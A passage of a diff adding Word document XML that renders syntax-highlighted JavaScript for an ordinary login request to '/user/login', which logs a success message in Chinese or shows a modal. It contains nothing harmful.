+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'/user/login'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>).</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>then</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>((</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>=&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>        </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>if</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>status</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> === </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="B5CEA8"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> &amp;&amp; </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>status</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> === </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="B5CEA8"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="6A9955"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>// location.href = '/';</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'登录成功'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>        }</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>else</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>modal</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>show</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>({</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>                </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>content:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
